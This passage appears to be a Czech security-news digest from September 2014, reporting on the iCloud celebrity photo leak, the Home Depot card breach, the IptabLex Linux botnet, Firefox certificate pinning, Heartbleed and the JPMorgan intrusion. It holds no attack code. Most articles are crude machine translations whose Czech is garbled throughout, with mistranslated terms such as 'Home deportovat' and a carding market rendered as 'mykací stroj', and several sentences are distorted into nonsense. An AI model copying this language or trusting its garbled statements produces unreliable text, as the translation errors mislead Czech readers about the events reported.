bezpečné.


Tox: Open-source, P2P Skype alternativa
6.9.2014 Software
Pokud máte rádi pohodlí Skype, ale máte obavy o státní dozor, a nevěří Microsoft, aby vás v bezpečí proti němu, Tox může být jen věc pro vás. Tox je zdarma a open source peer-to-peer Messaging Application, že si klade za cíl nahradit službu populárního Microsoft VoIP a IM. Tox je vlastně název programu jádra, které zpracovává zprávy a šifrování, a používat je je třeba stáhnout klienta pro platformu, kterou používají. Ne všichni klienti mají stejné vlastnosti , ale hlavní plochu z nich podporuje zasílání zpráv, video a audio chat. V nedávné zprávě od Wired, David Lohle, mluvčí projektu Tox, vysvětlil jeho založení. Všechno to začalo na 4chan, v probuzení odhalení Edward Snowden je o špionážní činnosti NSA, který na svědomí Microsoft jako "spolupracovník" v americké zpravodajské komunity. Skupina členů tech fóru webu začal diskutovat o vytvoření Skype alternativu, která nebude náchylná k úsilí o dozor. Za tímto účelem, Tox nepotřebuje centrální server pro výměnu zpráv - uživatelé se připojují přímo k sobě. Také zprávy a volání - a všechny další údaje (například soubory) můžete odesílat nebo přijímat -. Jsou šifrovány . Samozřejmě, protože projekt je stále ve vývoji, stále ještě existují některé chybějící funkce, ale tým pracuje na tom developer tým byl přijat z 4chan, reddit, a Hacker News, a pracuje na projektu zdarma. Tox jádro a klienti nebudou zpeněžit, říká Lohle. Dej Tox kód je open source, každý může si jej a hledat bezpečnostní chyby, a navrhnout změny. Když projekt dosáhne stabilního stavu, mají v plánu najmout nezávislého bezpečnostní firmu, aby audit kód, aby bylo možné řešit problémy a zároveň uklidnit uživatele. Za současného stavu, bylo by moudré, aby uživatelé očekávat celkovou bezpečnost. Pro ​​více informací o projektu, podívejte se na projektu FAQ a wiki stránek a aktualizace na vývojářský blog Tox.


Dejte si pozor na podvody po celebrity nahé foto novinky
6.9.2014 Hrozby

Jak FBI potvrdil , že se vyšetřování úniku nahých fotografií (některé skutečné, některé falešný) o sto ženských celebrit, hon na člověka (s?) za to je také on-line, jako 4chan uživatelé se snaží vyslídit totožnost zrádce. Další věc, zjistit, jak ty fotky byly ukradeny. Apple oprava chybu zabezpečení v Find My iPhone on-line služby, které by mohly být použity pro přístup k iCloud účty celebrit tím, brute-nutí hesla, po Nástroj využití vada byla zveřejněna na GitHub den předtím, než byly unikly obrázky. autor Tento nástroj uvedl, že je velmi nepravděpodobné, že by byl použit pro hack, protože "je to velmi obtížné provést tento druh cíleného útoku za jeden den." Odhalení , že sdělovací prostředky byly stále nabídek ke koupi fotografie pro týdny, než se zdá únik potvrdit. Ale, jak zdůraznil , že je možné, že hackeři zneužít stejnou chybu. Stejně jako v tomto případě odhaluje, Symantec Satnam Narang varuje uživatele, aby dávat pozor na Apple ID phishing a SMSishing pokusů, které jsou určitě sledovat novinky a o odkazy, které údajně vedou k fotografiích, ale ve skutečnosti se jim škodlivé zfalšovaných webových stránek se snaží dostat k instalaci malwaru. UPDATE: Andrew Jaquith, CTO a SVP Cloud strategie na SilverSky, se s námi podělil o svůj názor na hack:

Podíval jsem se na kód "ibrute" na GitHub také, a dospěl k závěru, že to byla zahrada-odrůda brute-force útok. Kód by dovede k závěru, že spekulace o Apple není omezení počtu pokusů při ověřování na Find My iPhone přes JSON je v pořádku. To je jasně určen pro použití aplikacemi a není obrazovka rozhraní prohlížeče. ještě zajímavější, "fmipmobile.icloud.com" hostitele, který ibrute kód overuje se nachází v 76 dalších projektů, GitHub. Skoro každý jeden z nich jsou určeny, aby programátoři dotaz umístění iPhone. Takže toto ověření vektor byl jednoznačně dobře známo, že širší programové komunity. To jen tak se stalo, že některé oportunní hackeři si uvědomil, že by mohl být použit k brute-force hesla k účtům, protože neměl účinné kontroly uzamčení. tahání zpět na 10.000 stop: můžeme očekávat, že toto bude další příklady, jako je tento: využití (1) cloud služby API autentizace - určeny pro použití programátory - že (2) jsou bezpečnostní kontroly, které jsou méně přísné než ty, které jsou uživatelsky orientovaný. Tento hack iCloud je pouze nejvyšší příklad profilu, ale lze očekávat, že oportunisté hledat slabiny v každém případě, kdy je mobilní aplikace, nebo nativní dotýká vzdálené cloud služby. iCloud, Google Play Services a různé mobilní app obchody jsou poctivá hra, stejně jako mnoho dalších.


Expert mezinárodní počítačové trestné činnosti pracovní skupina se zabývá on-line kriminalitě
6.9.2014 Kriminalita
Se konalo v Evropském kyberkriminalitě Centre (EC3) při Europolu, bude společná pro boj proti kyberkriminalitě akce Pracovní skupina (J-CAT), který je pilotován po dobu šesti měsíců, koordinovat mezinárodní vyšetřování se partneři pracují bok po boku, aby přijaly opatření proti počítačové trestné činnosti hlavních hrozeb a horní cíle, jako jsou podzemní fórech a malware, včetně bankovních trojských koní. J-CAT budou pod vedením Andy Archibald, náměstek ředitele Národního Cyber ​​Crime Unit od National Crime agentury ve Velké Británii (NOK). J-CAT byla zahájena podle EC3 Europolu, EU pro boj proti kyberkriminalitě pracovní skupina, FBI a NCA a J-CAT tvoří tým složený z Cyber ​​styčných důstojníků z odhodlaného a úzce zapojeny členské státy, které nejsou členy EU donucovacími partnery a EC3. hlavní podíl na inteligenci Bazén bude členské státy EU prostřednictvím EC3 a dalšími partnery činnými v trestním řízení spolupráce. Tak daleko, Rakousko, Kanada, Německo, Francie, Itálie, Nizozemsko, Španělsko, Velká Británie a USA jsou součástí J-CAT. Austrálie a Kolumbie se také zavázaly k této iniciativě. Troels Oerting, ředitel Evropského centra pro boj proti kyberkriminalitě říká: "Poprvé v novodobé historii policie mnohostranný trvalé počítačové trestné činnosti pracovní skupina byla zřízena v Evropě koordinaci vyšetřování proti top cybercriminal sítí. Cílem není čistě strategické, ale také velmi funkční. Cílem je předcházet počítačové trestné činnosti, to narušit, chytit podvodníci a chopit se své nelegální zisky. " "Toto je první krok v dlouhé procházce směrem k otevřeným, transparentním, zdarma, ale také bezpečný internet. Cílem nemůže být dosaženo činných v trestním řízení sám, ale bude vyžadovat konsolidované úsilí z mnoha zúčastněných stran v naší globální vesnice. Ale J-CAT budou dělat svou část nezbytných Heavy-zvedání ", a že práce začaly dnes. Jsem si jist, budeme vidět praktické hmatatelné výsledky velmi brzy, "dodal Oerting. pan Archibald řekl: ". Existuje mnoho problémů, kterým čelí činnými v trestním řízení s ohledem na počítačové zločince a kybernetických útoků To je důvod, proč musí být skutečně komplexní a společný přístup pořízené při jejich řešení. " "J-CAT bude poprvé, dát dohromady koalici zemí po celé Evropě i mimo ni koordinovat operační reakci na společných stávajících a vznikajících globálních kybernetických hrozeb, jimž čelí členové J-CAT . " "Je to jedinečná příležitost pro mezinárodní donucovací orgány společně sdílet naše znalosti k obraně proti útokům kybernetických související, a National Crime Agency ve Velké Británii je hrdý na to být jedním ze zakládajících členů". EC3 se podílí na přeshraničním vyšetřování počítačové kriminality a zaznamenala rychlý růst velkých mezinárodních případech. J-CAT má za cíl významným způsobem přispět k mezinárodní spolupráci při vymáhání práva, a maximalizovat účinnost společných a koordinovaných akcí. Počítačová kriminalita se týká občanů, podniků a vlády, bez ohledu na jejich národní hranice nebo jurisdikcí. Policejní síly po celém světě se potýkají s podobnými zločiny a kriminální cíle. Z tohoto důvodu je více než s jakýmkoliv jiným typem trestné činnosti, je velmi důležité pro sdílení informací a sladit priority. J-CAT nabízí možnost řešit nejvlivnějších trestným činům poškozujícím mnoha státech v rámci společného, ​​dobře koordinovaně a za pomoci EC3. J-CAT budou shromažďovat údaje o konkrétních trestných témata z národních archivů a od příslušného státu a soukromých partnerů, stejně jako transformace tento surová data do využitelných informací, a navrhuje cíle a sítě pro vyšetřování. To bude zahrnovat všechny relevantní oblasti, jako je malware kódování, testování, distribuce, Botnety, Krimi-as-a-Service, online podvody, narušením a podobné špičkových zločiny.


Nový Firefox nabízí ochranu MITM pomocí veřejného klíče vypichování
6.9.2014 Zabezpečení
Mozilla vydala nejnovější verzi Firefoxu (V32) pro Windows, Mac, Linux a Android, a nový prohlížeč sportovní některé pozoruhodné vylepšení zabezpečení. Za prvé, nová verze je veřejný klíč připnout podpora povolena. "Public Key Volba standardních stříbro je mechanismus pro weby určit, které certifikační autority vydaly platné CERT na tomto místě, a pro uživatele agenti odmítnout připojení TLS na těchto stránkách, pokud je certifikát není vydán známý dobrý CA. veřejný klíč balíků brání man-in- -middle útoky kvůli nepoctivým certifikačních autorit, které nejsou v seznamu stránek, "společnost vysvětlil a dodal, že skutečnost, že Firefox neměl podporu pro to, povolte je důvod, proč nezjistil podvodů SSL certifikáty vytvořené po útoku DigiNotar . Pro tuto chvíli, seznam připnul stránky obsahují Twitter "a některé její subdomény a vlastní stránky Mozilly. Budoucí verze budou hodit další Twitter on-line aktiv společnosti Google, Dropbox, účty Firefox a webové stránky TOR. Za druhé, společnost odstranili některé 1024-bit kořenové certifikáty ze svého seznamu Trust (digitální certifikáty, které používají 1024-bit RSA klíče nejsou považovány trezor), a za třetí, tři kritické, dva vysoké a jeden středně slabé místo zabezpečení, které byly opraveny . Tato nejnovější verze má také další vylepšení výkonu, seznam, ve kterém můžete vyzkoušet zde .


Home Depot porušil, carders prodeji ukradené informace platebních karet
6.9.2014 Incidnety
Home Depot, populární americký kutil a výstavba prodejce, který se může pochlubit 2.200 obchodů v USA a 287 v zahraničí, zřejmě utrpěl narušení dat, která ohrožena zákazník kreditní karty. možnost byla poprvé označeny Brian Krebs , který dostal slovo, že dvě šarže kreditních a debetních karet informací zřejmě ukradené společnosti je v současné době v prodeji na neslavný rescator (tečka) cz podzemí mykací stroj na trhu. Jedna dávka zdánlivě obsahuje údaje karty evropských uživatelů, druhý, že zákazníci v USA. "Existují náznaky, že pachatelé tohoto zjevného porušení může být stejná skupina ruských a ukrajinských hackerů odpovědných za narušení dat v cíli, Sally Beauty a PF Chang je, mimo jiné, "poznamenal. "To není v tuto chvíli jasné, jak mnoho obchodů může mít byly ovlivněny, ale z předběžné analýzy vyplývá, že toto porušení může rozšířit do všech 2200 Home Depot obchodů ve Spojených státech. " alarm poprvé vznesena několika bank, kteří si koupili šarže kartu ze zločinců a šel přes ně k identifikaci dotčených zákazníků. Zdá se, že věří, že toto porušení může mít zpočátku se stalo koncem dubna nebo začátkem května 2014. Pokud ano, podvodníci by mohly mít ve svých rukou počet karet, které výrazně předčí číslo ohrožena Target porušení, Krebs poznamenal. "My 're hledáte do nějaké neobvyklé činnosti, které mohou poukazovat na možné porušení platební údaje a my pracujeme s našimi bankovními partnery a vymáhání práva, aby vyšetřily, "Home deportovat uvedeno v prohlášení zveřejněném na svých internetových stránkách. "Pokud se nám potvrdit, že došlo k porušení, budeme ujistěte se, že naši zákazníci jsou okamžitě informovány." Oni také ujistěte se, že upozornit na potenciálně dotčené zákazníky, kteří nebudou mít odpovědnost za případné podvodné obvinění. "Ujistěte se, že jsou úzce sledování vašich účtů a dostat se do svého vydavatele karty zjistíte jakékoli neobvyklou aktivitu, "radili. "Pokud se nám potvrdí porušení, budeme nabízet bezplatné služby ochrany identity, včetně sledování úvěru na všech potenciálně zasažených zákazníků." "potenciální porušení v Home Depot pocit deja vu v brázdě cílových masivní porušení v loňském roce. Hlášenou rozsah a časová osa se ​​datuje k dubnu a květnu tohoto roku naznačují podobný typ události k dosažení cíle, kde útočníci byli schopni se dostat do sítě odčerpat velké množství dat, aniž by byla odhalena, "řekl Eric Chiu, prezident a spoluzakladatel společnosti na HyTrust. "Tyto porušení již bezpečnostní nebo IT problém, ale spíš obchodní záležitost s ohledem na potenciální masivních ztrát a poškození značky. Spotřebitelé by měli mít možnost očekávat lepší zabezpečení od nás. Zvlášť když organizace hit s porušením podobné jiní v jejich stejném odvětví ... a ještě horší, ten, který následuje po porušení svých vlastních systémů. " Philip Lieberman, generální ředitel společnosti Lieberman Software, řekl, že nebyl překvapen, co se to stalo. "Byli jsme v kontaktu s nimi před mnoha lety snaží se je přesvědčit, aby realizaci automatizační techniky otočit svá hesla, ale rozhodl se zavést levnější a horší řešení z off-shore společnosti. Zbytek cílů v uvedených článku podle Krebs koupil stejnou neefektivní technologie ze stejného off-shore společnost s podobnými výsledky. " "organizované zločinecké syndikáty nám aktivně zaměřují na maloobchodníky prostě proto, že jsem skutečně staly cíle; Tyto skupiny využívají vlastních chyb v platebních architektur a aplikací, mimo jiné taktiky, aby se do těchto obchodních řetězců a sifon data z nepozorovaně, "Ken Westin, bezpečnostní analytik Tripwire, zdůraznil. "Existuje jen málo, aby spotřebitelé mohli udělat přímo na chránit před těmito jakési kompromisy, "uzavírá Patrick Thomas, bezpečnostní konzultant společnosti Neohapsis. "Jistě všichni spotřebitelé by měli bedlivě sledovat na své výpisy z kreditní karty a kreditní zprávy, ale také mohou volit své dolary a ocenit společnosti, které veřejně demonstrují závazek k bezpečnosti."


Linux infiltrovali a kontrolované v DDoS botnet
6.9.2014 Viry | BotNet
Akamai Technologies upozornění podniky k ohrožení vysokým rizikem iptables a infekcí IptabLex na linuxových systémech. Škodlivé aktéři mohou používat infikovaných systémů Linux zahájit DDoS útoky proti zábavním průmyslu a dalších vertikál. masivní zamoření iptables a IptabLex zdá se, že byl dán velký počet linuxových webových serverů, které jsou ohroženy, a to především využije Apache Struts , Tomcat a ElasticSearch zranitelnosti. Útočníci použili zranitelnost Linux na neudržovaných serverů, abyste získali přístup, stupňovat oprávnění umožňuje vzdálené ovládání počítače, a poté pokles škodlivý kód do systému a spusťte jej. Výsledkem je, že systém by mohl pak být řízen dálkově jako součást DDoS botnet. indikace po infekci je užitečné zatížení pojmenované .IptabLes nebo. IptabLex umístěn v adresáři / boot. Tyto soubory skriptu spustit .IptabLes binární na restartování. malware obsahuje také funkci self-aktualizační která způsobí, že infikovaný systém pro kontaktování vzdáleného hostitele ke stažení souboru. V laboratorním prostředí, infikovaný systém se pokusil kontaktovat dvě IP adresy v Asii. "jsme vystopovat jeden z nejvýznamnějších DDoS útoku kampaně v roce 2014 s infekcí iptables a IptabLex malware na systémech Linux," řekl Stuart Scholly, senior VP a GM, Security Business Unit, Akamai. "Jedná se o významný rozvoj kybernetické bezpečnosti, protože operační systém Linux není běžně používán v DDoS botnetů. Škodlivé herci využili známých zranitelností v unpatched softwaru Linux zahájit DDoS útoky. Linux administrátoři potřebují vědět o této hrozbě přijmout opatření na ochranu svých serverů, "dodal Scholly. Asie zřejmě významným zdrojem DDoS útoky řídicích a kontrolních středisek (C2, CC) pro iptables a IptabLex se v současné době nachází v Asii. Infikované systémy byly zpočátku známo, že v Asii; Nicméně, v poslední době mnoho infekcí byly pozorovány na serverech hostované v USA a v jiných oblastech. V minulosti, většina infekcí DDoS bot pochází z Ruska, ale teď Asie se zdá být významným zdrojem rozvoje DDoS. Kompletní poradenství je k dispozici zde (nutná registrace).


iCloud nebyl hacknutý, říká Apple
6.9.2014 Cloud
Apple vydala prohlášení popřel, že iCloud byl donucen k ukrást nahé fotky celebrit. "Když jsme se dozvěděli o krádeži jsme byli pobouřeni a okamžitě mobilizoval inženýry Apple objevit zdroj," řekli. "Po více než 40 hodinách zkoumání jsme zjistili, že některé celebrity účty byly ohroženy velmi cíleným útokem na uživatelských jmen, hesel a bezpečnostních otázkách, praxe, která se stala příliš běžné na internetu. Žádný z případů, které máme zkoumaní vedla z jakéhokoli porušení v některém ze systémů Apple, včetně iCloud nebo Find my iPhone. jsme další spolupráci s donucovacími orgány s cílem pomoci identifikovat zločince spojené. " Zdá se, že celebrity dotčené padl za oběť cíleného phishingu a sociálním inženýrstvím. Společnost se nevyjádřil k existenci iBrute nástroje pro brute-nutí Apple ID hesla, ani na záplatování na vady, které umožnilo, že se do práce. Podle Andy Greenberg , hackeři aktivně vysílání nahé selfies na webovém fóru Anon-IB byly otevřeně říká, že oni byli použití (právní) ElcomSoft je telefon Password Breaker software ke stažení celé iCloud zálohování obětí, mezi něž patří fotografie a videa, ale také kontakty, textové zprávy a data aplikací. Je také možné, že mají používali iBrute nebo podobného nástroje dostat obětem "- a nejen celebrity" - Apple ID a heslo. Vyzbrojeni těmito informacemi, pomocí softwaru Elcomsoft je jednoduché jako facka. Software, který je často používán vymáhání práva, má stát hodně (399 dolarů), ale ilegální kopie lze nalézt na bittorrent stránkách. Apple doporučuje všem uživatelům používat silná hesla, a umožnit ověření ve dvou krocích. Můžete se také podívat na tento užitečný příspěvek Nick DePetrillo pro průvodce krok za krokem, jak nastavit dvoufaktorovou autentizaci pro iCloud (Apple ID) a Dropbox. Ale, bohužel, funkce ověření ve dvou krocích nechrání Uživatelé proti hackerům instalaci své iCloud zálohy na nová zařízení - na to, že útočníci potřebují jen Apple ID a heslo. Chris Soghoian, ACLU je hlavní technolog a vedoucí analytik má několik nápadů na změny, které technologické společnosti by měly uplatňovat, aby se zabránilo útokům, jako je tento se děje. "Apple, Google a další velké technologické společnosti, by měla uznat, že miliony svých zákazníků pravidelně používají jejich produkty, aby se zapojily do citlivých intimních aktivit," poznamenal. "Tyto společnosti mohou a měly by nabídnout možnost, soukromé fotografie" pro citlivé fotografií, které jim brání být nahrán do cloudu. Ještě důležitější je, že by se ke svým zákazníkům jako dospělí a vzdělávat je o tom, jak mohou využít své výrobky a služby, aby se zapojily . intimních činnostech, co nejbezpečněji " Na závěr mi dovolte, abych vás opustím toto varování: dejte si pozor na podvody online po celebrity nahé foto novinky.


Počítačoví zločinci rádi PayPal, finanční podvodnou na vzestupu
6.9.2014 Incidenty
Odborníci společnosti Kaspersky Lab zaznamenala podstatný nárůst ve výši finančního phishingu ve spamu. Tam byl 7,9 procentní body, zvýšení množství podvodných e-mailů, které využívají jména renomovaných bank, platebních služeb, on-line obchodů a podobné organizace. Výsledkem je, že takové zprávy představoval téměř 42 procent všech phishingových zpráv. Ze všech platebních systémů, zločinci věnována největší pozornost na PayPal:. odkazy na tuto službu spustil nejdramatičtější nárůst upozornění Celkový podíl spamu v e-mailovém provozu zvýšil o 2,2 procentního bodu v červenci, přinášet to 67 procent. USA je opět "vedoucí" země původu nevyžádané pošty: jedna šestina (15,3 procenta) ze všech globálního spam byl odeslán z této země. Rusko udržuje dlouhodobé druhé místo v tomto žebříčku s 5,6 procenta veškeré nevyžádané pošty; Toto, nicméně, je 1,4 procentních bodů méně než v červnu. Čína je i nadále na třetím místě, dodává 5,3 procenta světového spamu. Pokud se podíváme na témata spamu, dlouhé horké léto jistě zanechaly svou stopu. Zejména ruský segment internetu viděl nárůst spamových zpráv propagujících ochranu před slunečním zářením a předměty k boji teplo. V červenci Odborníci společnosti Kaspersky Lab také zaznamenala nárůst počtu nevyžádaných e-mailů, které nabízejí širokou škálu letních zboží, jako jsou:. Klimatizace, větráky, ochranu proti slunečnímu záření fólie pro okna, balenou vodu a sluneční brýle Letní také znamená dovolenou, a od každého chce vypadat co nejlépe na pláži, spammeři byli na straně nabídnout nějakou pomoc. Tam byl množství nevyžádaných e-mailů v reklamě července všechny druhy kosmetiky pro péči o pleť a sezónní slevy z kosmetických obchodů a salonů. Odborníci společnosti Kaspersky Lab také objevil video tutoriály inzerované jako "tajemství krásy" prozradil renomovaný stylista. Spammeři neměli přehlédnout pro firemní uživatele, a to buď, i když činnost je daleko od svého vrcholu v červenci. V polovině léta, zločinci se specializuje na distribuci reklamních e-mailů v ruské části internetu se rozhodl přitáhnout pozornost uživatelů s nabídkami spojené s pořádáním firemních akcí venku a vodní zábavy. "V létě, obchodní činnost zpomaluje a spammeři přejít na více lukrativní partnerem spam -. včetně některých škodlivých korespondenci Výsledkem je, že spam se stává trestným činem, a představuje větší riziko pro uživatele, tedy v červenci jsme si všimli, že spammeři vzali větší zájem v oblasti finančních služeb navíc na první místo v naší.. hodnocení škodlivých spamu příloh byl, poprvé po dlouhé době, pořízena Trojan downloader slouží k ukrást citlivá data uživatelů, "uvedl senior spam analytik Kaspersky Lab Tatyana Shcherbakova.


Zdarma bezpečnostní software identifikuje cloudu zranitelná
6.9.2014 Cloud
Zda reagovat na objednávky zákazníků nebo žádosti o partnerských dat, největší cloud bezpečnostní problém pro podnikání je přímá komunikace mezi aplikacemi. Chcete-li pomoci společnostem identifikovat bezpečnostní rizika cloud computingu, Managed metody vydala Cloud Service Discovery Free .

Určeno pro IT a bezpečnostních profesionálů, služba poskytuje ucelený pohled na údaje vyměňované s partnerskými a cloudových aplikací mimo síťové brány firewall. Zcela pasivní, to běží na non-výrobních systémů, a nevyžaduje změny brány firewall. Kromě sledování "Shadow IT", kde jednotliví pracovníci využívají cloudové aplikace, to ukazuje na zvýšené riziko provozu, který teče mezi podnikovými aplikacemi v celém podniku hybridního cloudu . "Když mluvíme s našimi zákazníky, většina nemá povědomí o tom, jaké údaje jsou vyměňovány s aplikací v cloudu," uvedl Don Bergal , COO v řízených metod. "Pokud nevíte, to je problém." Schopnosti:

Objevte cloud bezpečnostní rizika
Identifikovat odchozích uživatelů cloudu
Identifikovat příchozí aplikací z cloudu
Použití a neúspěšný pokus o ukazatele
Offline pasivní sledování.


Nejnovější verze Firefoxu přidává lepší ochranu SSL

5.9.2014 Zabezpečení
Firefox 32 implementoval funkci označovanou jako připnutí klíče certifikátu (certificate key pinning).

Společnost přidala ve své poslední verzi prohlížeče Firefox nový druh ochrany, která by měla pomoci zabránit kyberzločincům zasahovat do zabezpečené komunikace s velkými poskytovateli online služeb.

Funkce, známá jako připnutí klíče certifikátu, umožňuje online službám určit, které certifikáty SSL/TLS jsou platné pro jejich služby. Tyto certifikáty se používají k ověření, že web je legitimní, a také k oboustrannému šifrování přenášených dat.

Úkolem této funkce je zabránit útokům na zabezpečenou komunikaci klienta se serverem, k jakému například došlo v roce 2011, kdy se kyberzločincům podařilo proniknout do komunikace uživatelů se službou Gmail. Nizozemská certifikační autorita (CA), Diginotar byla buď podvedena, nebo napadena a vydala platný certifikát SSL, který fungoval pro doménu Google.

To teoreticky umožnilo útočníkům vytvořit pomocí falešného certifikátu SSL webové stránky, které vypadaly jako Gmail a které se z pohledu prohlížeče jevily jako zabezpečené a pravé. Bezpečnostní experti již dlouho varují, že hrozí útoky zaměřené na certifikační autority. Připnutí certifikátu by mělo tento druh útoku zastavit, protože Firefox by věděl, že Diginotar by pro Google neměl vydávat žádné certifikáty.

„Pokud bude ve Firefoxu 32 některý z certifikátů v řetězci ověřených certifikátů odpovídat jednomu z platných (připnutých) certifikátů, Firefox zobrazí ikonu zámku jako normální,“ napsal Sid Stamm, vrchní manažer pro zabezpečení a ochranu soukromí Mozilly, na blogu společnosti. „Když se kořenový certifikát pro připnutý web neshoduje se žádnou ze známých podporovaných certifikačních autorit, Firefox odmítne připojení a ohlásí chybu připnutí,“ dodal. „Připnutí“ pro certifikáty online služeb musí být zakódovány do Firefoxu. Firefox 32, vydaný tento týden, podporuje stránky Mozilly a Twitteru. Další verze Firefoxu by měly podporovat připnutí certifikátů pro stránky služeb jako Google, Tor nebo Dropbox.


Comguard a IDG zvou na mezinárodní konferenci o bezpečnosti ICT

5.9.2014 Konference
Jaká jsou aktuální řešení v boji proti malwaru, jak vypadá detekce složená z postupných analýz, co jsou technologické inovace řešení webových a e-mailových bran, co může přinést nový management pro mobilní zařízení či jak vyzrát na zálohování dat a virtuálních strojů? Na to vám odpoví mezinárodní konference Security & Networking Praha 2014, kterou pořádá Comguard a jehož partnerem je IDG včetně magazínu Securityworld.

Podtitulem akce je „Hrozby musíme umět předvídat“ a účastnit ser jí můžete ve čtvrtek 25. 9. 2014 v Aquapalace Hotel Prague v Čestlicích od 9.00 do 16.00 hodin. Bližší informace a registrace zde. Bezpečnostní odborníci Comguardu se v tradiční sekci TOP USE CASES zaměří na to, jak umí malware elegantně obejít antivirová řešení a na testech z Kompetenčního centra ukážou, jak různé modifikace malwaru detekovat.

Účastníci konference budou provedeni skládačkou moderních datových center, která musí splňovat podmínky pro cloudové služby, mobilitu, vysokou dostupnost a jednoduchou správu. Součástí programu budou i dvě případové studie, právní okénko s advokátní kanceláří Havel, Holásek & Partners, které se tentokrát zaměří na implementace softwaru, specifika cloudu a smluv na cloudové služby a zpráva z kybernetického evropského cvičení CyberEurope 2014 v podání milého hosta Andreji Kropáčové z CSIRT.CZ

Přednášky a prezentace budou doplněny o živé ukázky, návody a konzultace během celého dne.

Generálním partnerem akce je společnost McAfee, partnery firmy Barracuda, Brocade Communications, Cyberoam, Observe IT a Sophos.


Hackeři jsou schopni obejít zabezpečení iCloud, varují experti

4.9.2014 Cloud
Služba iCloud od Applu, která umožňuje uchovávat fotografie a osobní údaje uživatelů iPhonů a iPadů na vzdáleném serveru společnosti, má „zásadní bezpečnostní chybu”. Uvedla to na svých internetových stránkách BBC s odvoláním na varování expertů. Internetová služba je nyní prověřována kvůli ukradení a úniku intimních snímků celebrit.
Služba iCloud od Applu umožňuje uchovávat fotografie a osobní údaje uživatelů iPhonů a iPadů na vzdáleném serveru společnosti Apple.
Podle jednoho experta se ukázalo, že bezpečnostní opatření nazývané ověření ve dvou krocích, které Apple doporučuje, lze obejít pomocí snadno dostupného softwaru, který umožňuje přístup k zálohování iCloudu. Apple se ke zprávě odmítl vyjádřit.

Ověření ve dvou krocích vyžaduje, aby uživatel před uvolněním přístupu k jeho účtu zadal krátký kód zaslaný Applem na jeho telefon nebo tablet. Tento krok má nabídnout vyšší úroveň ochrany. V úterý Apple poté, co přiznal, že některé jeho účty byly ohrožené "velmi cíleným útokem", doporučil uživatelům, aby vždy používali "silné heslo a umožnili ověření ve dvou krocích". Podle jednoho experta však tím Apple dává lidem "falešný pocit bezpečí".

Technologický časopis Wired jako první napsal, že software od ruské firmy ElcomSoft je považován hackery za užitečný nástroj pro infiltraci na účty na službě iCloud. Program prý nabízí přístup k obsahu na iCloudu bez potřeby vlastnit iPhone nebo iPad dotyčného. Využívá systém vyvinutý ruským programátorem Vladimirem Katalovem, kterému se podařilo zkopírovat data uložená na iCloudu. Katalov řekl BBC, že věří, že software ElcomSoftu byl použit při nedávném úniku fotek, protože je jediný, který je toho schopen. Zatím to však nebylo prokázáno.

Odborník na bezpečnost Mikko Hypponen BBC řekl, že problém je v tom, že systém nepožaduje ověření ve dvou krocích, pokud se uživatel chce pouze dostat ke svým fotkám nebo obnovit zálohování. BBC upozornila, že dokonce i Apple na svých stránkách o ověřování ve dvou krocích neuvádí, že tento systém chrání fotografie, kontakty nebo položky v kalendáři zálohované na iCloudu.

Nejsou jediní
Další odborníci na bezpečnost uvádějí, že doporučení Applu o ověřování ve dvou krocích je možná zavádějící. "Je nebezpečné naznačovat, že ověření ve dvou krocích je deštník, který bude chránit, protože zjevně to není tento případ," řekl David Emm z firmy Kaspersky. "V pancíři jsou štěrbiny, které mohou být případně zneužity."

Odborník na počítačovou bezpečnost ze Surreyské univerzity Alan Woodward uvedl, že díra ve dvoustupňovém systému ověření Applu odpovídá "zásadní bezpečnostní chybě" a je to jako když "nadvakrát zamknete dveře a necháte otevřené okno". Také on se domnívá, že Apple dává svými doporučeními lidem falešný pocit bezpečí.

Hypponen však upozorňuje, že iCloud není jedinou zranitelnou službou. Je podle něj velmi pravděpodobné, že hackeři se zaměřují i na uživatele jiných produktů než od Applu.


Heartbleed stále kritická hrozba
4.9.2014 Zranitelnosti

Cyber ​​útočníci byli rychle využít Hearbleed OpenSSL chyba, ve výši stovek tisíc útoků za den v týdnu po veřejném odhalení své existence, statistiky sdíleny v poslední čtvrtletní zpravodajské Threat Report IBM X-Force ukázaly. "Velký důraz byl kladen na přípravu a zmírnění zero-day útoky, ale v případě Heartbleed, více zajímavá studie dojde po zveřejnění, když oba útočníci a podniky jsou závodní proti času," poznamenal Leslie Horacek, manažer odpověď ohrožení . IBM X-Force bezpečnostního výzkumu skupiny "IBM Managed Security Services (MSS) svědkem útočníky okamžitě přebudovat a využívání chybu v globálním měřítku," sdílela, a útoky přišel rychlý a silný (klikněte na screenshot pro zvětšení): Méně než dva týdny po, počet útoků, které se snaží zneužít chybu výrazně klesla, ale je stále významný. "MSS vidí v průměru 7.000 útoků za den po velkém útoku," je uvedeno v zprávě (nutná registrace). "Tam bylo mnoho ponaučení z Heartbleed útoky," výzkumníci poukazují. "Organizace, která se snažila k udržování aktuální databáze aktivum byly ponechány slepí, které systémy jsou zranitelné a které systémy byly kritické. I kdyby měli plán reakce na incidenty, potřebovali databáze up-to-date majetku za účelem jeho nasazení. " jejich zmírnění techniky, jako je použití brány firewall blokovat většinu útoků, stejně jako detekci a prevenci narušení zařízení může pomoci snížit riziko až patch může být nasazen. Mezi prodejci software obsahující tuto chybu může také nabídnout dočasné náhradní řešení, a konečně, dočasné řešení, které se často nebere v úvahu vypínání zranitelné systémy do patch k dispozici. Zatímco tento poslední volba není obvykle přivítal podniky, jak se jejich systémy a uživatelských dat možná ohrožena je ještě horší jeden. Bohužel, poslední čísla ukazují, že v roce i přes obrovské pozornosti Heartbleed obdržela, mnoho systémů stále unpatched, a to je situace, která útočníci budou i nadále využívat.


JPMorgan útočníci změněné bankovní záznamy
4.9.2014 Incidenty
Počet amerických bank, které zřejmě byly cílené a porušil hackery pomalu stoupá, protože novější zprávy říkají, že sedm finanční organizace byly zasaženy. nejmenované zdroje také říci, že rozsah útoků je také větší, že se původně myslelo, as JPMorgan hlášeny že útočníci změnit a odstranit některé bankovní záznamy. Podle bezpečnostních a bankovních expertů, počítačoví podvodníci byli známí dělat takové věci, i když jen zřídka. Podle Adam Kujawa, vedoucí Malware Intelligence v Malwarebytes Labs, je nepravděpodobné, že útočníci jsou "Průměrná zločinci." "Pokud hackeři jsou schopni toho dosáhnout, to znamená, že strávil značné množství času studiem systému záznamů [banky] Před zahájením jakékoliv vážné manipulace," řekl komentoval pro CNET. "Není to nemožné, ale pokud se jim podařilo změnit záznamy pomocí pověření na vysoké úrovni, a to takovým způsobem, aby byla nezjištěný." Opět platí, že v tuto chvíli nic konkrétního o identitě hackerů lze říci. Jak FBI a JPMorgan drží mámu, jak vyšetřování pokračuje. Vzhledem k tomu, jména ostatních pronásledovaných finančních institucí, které nebyly veřejně sdíleny, zákazníky všech amerických bank by 